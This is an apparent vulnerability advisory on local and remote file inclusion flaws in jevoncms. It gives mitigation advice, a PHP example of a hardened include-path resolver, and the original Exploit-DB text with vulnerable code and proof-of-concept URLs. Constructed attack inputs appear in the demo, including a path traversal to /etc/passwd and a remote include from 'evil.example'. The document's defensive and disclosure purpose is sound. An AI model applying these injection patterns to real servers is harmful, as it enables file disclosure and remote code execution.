Vendor: jevoncms
By: eidelweiss
CVSS: 8.8 (HIGH)
Category: Local File Inclusion (LFI) and Remote File Inclusion (RFI)
CWE: 98, 94
Product Name: jevoncms
Affected Version From: -
Affected Version To: -
Patch Exists: NO
Related CWE: -
CPE: -
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: -

jevoncms (LFI/RFI) Multiple Vulnerabilities

jevoncms is vulnerable to both Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit these vulnerabilities by sending a crafted HTTP request to the vulnerable application. The attacker can use the LFI vulnerability to read sensitive files from the server, while the RFI vulnerability can be used to execute malicious code on the server.

Mitigation:

To mitigate the LFI and RFI vulnerabilities, the include paths built in jevoncms.php, jvc_template.php and menu.php must not be derived from request-controlled values: resolve the requested module name against an allow-list of files the application actually ships, and check that the resolved path stays inside the intended directory, rather than trying to filter dangerous characters out of the input. Additionally, run PHP with allow_url_include disabled so that require() refuses URLs, and restrict the web server account to only the files and directories the application needs.
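The following is an added example, not code from jevoncms or from the advisory author. It places the include-path construction from jvc_template.php next to a hardened replacement that resolves the requested module against an allow-list inside a fixed base directory. The directory layout `<base>/<module>/<module>.php`, the `safe_module_path()` function and the temporary module tree it builds are assumptions made for the demonstration.

```php
<?php
// Added example (not jevoncms code): vulnerable include-path construction from
// jvc_template.php beside a hardened replacement.
declare(strict_types=1);

// Vulnerable pattern as it appears in jvc_template.php: the include target is
// built directly from a value the request can control. Anything the caller puts
// in $type (traversal sequences, a URL when allow_url_include is on) reaches require().
function vulnerable_module_path(string $type): string
{
    return "php/" . $type . "/" . $type . ".php";
}

// Hardened replacement (assumed API). $base is the module root and $allowed the
// list of module names the application ships. Returns the absolute path to
// include, or null when the request must be refused.
function safe_module_path(string $type, string $base, array $allowed): ?string
{
    // 1. Allow-list: only module names the application actually ships.
    if (!in_array($type, $allowed, true)) {
        return null;
    }
    // 2. Shape check (defence in depth): one path segment of word characters,
    //    so no separators, no "..", no scheme, no NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $type)) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    $candidate = $baseReal . DIRECTORY_SEPARATOR . $type . DIRECTORY_SEPARATOR . $type . '.php';
    // 3. Containment: the resolved file must exist and remain under $base.
    $real   = realpath($candidate);
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Self-contained demonstration: build a temporary module tree (constructed),
// then run a set of constructed inputs through the hardened resolver.
$base = sys_get_temp_dir() . '/jvc_demo_' . bin2hex(random_bytes(4));
mkdir("$base/news", 0700, true);
file_put_contents("$base/news/news.php", "<?php echo 'news module';\n");

$allowed = ['news', 'menu'];
$inputs = [
    'news',                       // legitimate, installed module
    '../../../../etc/passwd',     // traversal attempt (constructed)
    'http://evil.example/s.php',  // remote include attempt (constructed)
    "news\0",                     // NUL-byte truncation attempt (constructed)
    'menu',                       // allow-listed but not installed: realpath() fails
];
foreach ($inputs as $t) {
    $p = safe_module_path($t, $base, $allowed);
    printf("%-30s => %s\n", addcslashes($t, "\0"), $p === null ? 'REJECTED' : 'require ' . $p);
}

// Clean up the temporary tree.
unlink("$base/news/news.php");
rmdir("$base/news");
rmdir($base);
```

Only the first input yields a path; every other input is refused before `require()` is ever reached. The allow-list is the decision that matters; the character check and the `realpath()` containment test are there so that a future change to the allow-list (for example a module name read from configuration) cannot quietly reintroduce the original flaw.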
Source

Exploit-DB raw data:

########################################################
	jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title	:	jevoncms (libdir) Multiple Vulnerability
[+]Version:	-
[+]Download:	http://sourceforge.net/projects/jevoncms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thanks To: all friends

########################################################

	-=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/"; 
require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

***************************
[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
  $path= "php/".$type."/".$type.".php" ;
 // echo $path;
  require($path);

***************************
[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */

***************************

	-=[ Proof Of Concept ]=-


	http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

	http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path=[rfi shell]

	http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################